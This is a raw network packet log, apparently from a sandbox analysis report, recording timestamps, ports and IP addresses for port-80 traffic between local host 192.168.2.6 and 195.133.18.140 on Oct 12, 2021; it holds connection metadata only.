Oct 12, 2021 12:35:34.452205896 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.452220917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452250004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452272892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452295065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452317953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452339888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452359915 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.452361107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452393055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452415943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452435970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452457905 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.452464104 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452487946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452512026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452532053 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452553988 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452558994 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.452577114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452599049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452620983 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452644110 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452649117 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.452666998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452691078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452713013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452735901 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.452742100 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452765942 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452786922 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452809095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452831984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452852964 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452874899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452898026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452922106 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452945948 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452964067 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.452967882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.452987909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.453094959 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.545295000 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572158098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572201967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572227001 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572248936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572268963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572293043 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572315931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572339058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572345972 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572362900 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572386980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572412968 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572438955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572465897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572487116 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572489023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572513103 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572515011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572540045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572544098 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572566032 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572577953 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572591066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572608948 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572613955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572640896 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572643042 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572669029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572686911 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572705030 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572705030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572730064 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572731018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572756052 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572756052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572781086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572782993 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572805882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572809935 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572830915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572839022 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572859049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572868109 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572885036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572892904 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572910070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572921038 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572935104 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572958946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.572962999 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.572983027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573009014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573009014 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573034048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573036909 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573061943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573071003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573087931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573098898 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573112011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573132992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573136091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573158026 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573158979 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573184967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573196888 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573208094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573230982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573232889 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573257923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573280096 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573283911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573307037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573318005 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573331118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573354006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573363066 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573379040 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573401928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573411942 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573425055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573436022 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573452950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573474884 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573482990 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573498011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573519945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573525906 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573545933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573554993 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573570013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573592901 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573592901 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573616028 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573635101 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573641062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573662996 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573668003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573692083 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573703051 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573715925 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573725939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573740005 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573757887 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573762894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573790073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573798895 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573815107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573836088 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573841095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573884010 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573884964 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573911905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573939085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573960066 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573962927 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.573985100 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.573991060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574017048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574024916 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574040890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574054003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574064970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574089050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574090004 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574112892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574141026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574162006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574182034 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574202061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574222088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574223042 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574248075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574259043 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574274063 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574295044 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574297905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574325085 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574331999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574367046 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574368000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574390888 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574394941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574419022 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574419975 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574446917 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574450016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574476957 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574496031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574511051 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574521065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574533939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574546099 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574565887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574575901 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574593067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574616909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574619055 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574641943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574664116 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574666977 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574695110 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574697018 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574719906 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574742079 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574745893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574770927 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574796915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574826002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574839115 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574851036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574873924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574899912 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574903011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574904919 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.574928999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574951887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574975014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574997902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.574997902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.575018883 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.575022936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.575025082 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.575057030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.575089931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.575098038 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.575138092 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.575140953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.575170994 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.575176954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.575200081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.575216055 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.575237989 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.575284958 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601083040 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601119041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601161957 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601187944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601212025 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601236105 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601258039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601280928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601301908 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601325989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601345062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601373911 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601458073 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601474047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601499081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601524115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601526022 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601548910 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601557016 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601577044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601586103 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601603031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601628065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601629019 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601650953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601675034 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601675987 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601696968 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601718903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601727962 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601738930 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601763010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601768970 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601785898 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601785898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601807117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601818085 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601829052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601850033 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601859093 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601871967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601895094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601903915 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601918936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601938009 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601943970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601969004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.601970911 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.601991892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602013111 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602014065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602036953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602051020 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602061987 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602082968 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602083921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602107048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602123976 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602133036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602157116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602180004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602200985 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602201939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602224112 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602246046 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602267981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602291107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602317095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602319956 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602339983 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602339983 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602365971 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602375031 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602391958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602416992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602416992 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602437973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602510929 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602514982 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602535963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602560997 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602586031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602595091 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602612019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602636099 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602655888 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602662086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602686882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602710009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602730989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602731943 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602756977 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602777958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602778912 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602792025 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602802992 CEST	80	49749	195.133.18.140	192.168.2.6
